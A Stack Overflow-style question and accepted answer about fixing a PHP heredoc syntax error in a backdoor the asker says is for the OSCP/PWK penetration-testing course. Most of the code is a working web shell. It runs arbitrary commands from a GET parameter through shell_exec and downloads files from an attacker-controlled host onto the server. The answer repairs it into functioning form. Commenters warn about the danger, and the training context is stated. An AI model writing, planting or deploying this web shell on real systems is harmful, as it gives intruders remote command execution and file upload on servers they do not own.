# PHP errors when script returns HTML and PHP in single function

Tags: php, security

NOTE: For those who did point it out. Yes, the code uses insecure functions `shell_exec` with `GET`. This is intentional. The script is part a PHP backdoor that I am using as part of the [PWK](https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/) course.

```
if ($_GET['cmd']) {
    echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
 }
```

The rest of the script implements some very basic authentication before this function is reached.

I have a `php` function that I want to use to return a basic view/form with two input fields and supporting PHP logic in two `if` statements.

The issue that I have is that in the current form the PHP displays two errors:

1. `syntax error, unexpected '' (T_ENCAPSED_AND_WHITESPACE), expecting '-' or identifier (T_STRING) or variable (T_VARIABLE) or number (T_NUM_STRING)` on the `if ($_POST['upload'])`.
2. `Unexpected 'Unknown'.` on each of the `upload` and `cmd` variables

I have tried to do the method as below but the script seems to be breaking somewhere in the HTML or at the start of the PHP as functions below this are affected too.

```
function displayForm() {
    return <<<HTML
      <html>
        <body>
            <h1>somestuff</h1>
        </body>
      </html>
HTML;
}
```

How can I fix this so that the form and logic are returned properly to the user?

Full function...

```
function displayForm() {
    return <<<HTML
        <html>
            <body>
                <form action="" method="POST" enctype="multipart/form-data">
                    <input type="hidden" name="MAX_FILE_SIZE" value="1000000">
                    <p> File: <input type="file" name="fileToUpload" id="fileToUpload">
                    <input type="submit" value="Upload" name="upload">
                </form>
                <br><br>
                <form method="GET">
                    <p>CMD: <input type="text" name="command">
                        <input type="submit" value="Exec" name="cmd">
                </form>
                <pre>
                    <?
                        if ($_POST['upload']) {
                            file_put_contents($_POST['upload'], file_get_contents("http://$host:$port/" . $_POST['upload']));
                        }
                        if ($_GET['cmd']) {
                            echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
                        }
                    ?>
                </pre>
        </body>
    </html>
HTML;
}
```

Comment: Possible duplicate of [PHP parse/syntax errors; and how to solve them?](https://stackoverflow.com/questions/18050071/php-parse-syntax-errors-and-how-to-solve-them)

Comment: I'm not a security expert, but `shell_exec($_GET['cmd'])` sounds like a really bad idea. Executing something from the client invites hackers, especially a `get` variable.

Comment: ^^^ Not to mention `file_put_contents($_POST['upload'])`

Comment: I'm Bobby Tables and I approve this code.

Comment: @Chipster that is intentional, the code is part of a PHP backdoor that I intend to use as part of the OSCP. The remainder of the script implements some VERY basic authentication to check the right user is accessing it.

Comment: @miken32 see above

Comment: As long as you know what you're doing. Still looks VERY scary to me, especially considering @miken32 's comment. Just be careful this doesn't make it into production.

Comment: Just looked up OSCP (which I was unfamiliar with) and that makes a lot more sense now.

Answer (score 2, accepted):

You're not actually in HTML mode, you're defining a Heredoc string and so can't break in and out of PHP.  There are several ways to do this, here are two.  Build a variable to insert into the Heredoc:

```
function displayForm() {

    $extra = '';

    if ($_POST['upload']) {
        $extra .= file_put_contents($_POST['upload'], file_get_contents("http://$host:$port/" . $_POST['upload']));
    }
    if ($_GET['cmd']) {
        $extra .= "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
    }

    echo <<<HTML
        <html>
            <body>
                <form action="" method="POST" enctype="multipart/form-data">
                    <input type="hidden" name="MAX_FILE_SIZE" value="1000000">
                    <p> File: <input type="file" name="fileToUpload" id="fileToUpload">
                    <input type="submit" value="Upload" name="upload">
                </form>
                <br><br>
                <form method="GET">
                    <p>CMD: <input type="text" name="command">
                        <input type="submit" value="Exec" name="cmd">
                </form>
                <pre>
                $extra
                </pre>
        </body>
    </html>
HTML;
}
```

Or do it where you want it:

```
function displayForm() {
    $output = <<<HTML
        <html>
            <body>
                <form action="" method="POST" enctype="multipart/form-data">
                    <input type="hidden" name="MAX_FILE_SIZE" value="1000000">
                    <p> File: <input type="file" name="fileToUpload" id="fileToUpload">
                    <input type="submit" value="Upload" name="upload">
                </form>
                <br><br>
                <form method="GET">
                    <p>CMD: <input type="text" name="command">
                        <input type="submit" value="Exec" name="cmd">
                </form>
                <pre>
HTML;
                        if ($_POST['upload']) {
                            $output .= file_put_contents($_POST['upload'], file_get_contents("http://$host:$port/" . $_POST['upload']));
                        }
                        if ($_GET['cmd']) {
                            $output .= "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
                        }
    $output .= <<<HTML
                </pre>
        </body>
    </html>
HTML;

    return $output;
}
```

Do note that you want to be using `isset` or `!empty` depending on what you need here:

```
if (isset($_POST['upload'])) {
//and
if (isset($_GET['cmd'])) {
```

Also, this doesn't make much sense, as `file_put_contents` returns *the number of bytes written to the file*, unless that's what you want in your HTML:

```
$output .= file_put_contents($_POST['upload'], file_get_contents("http://$host:$port/" . $_POST['upload']));
```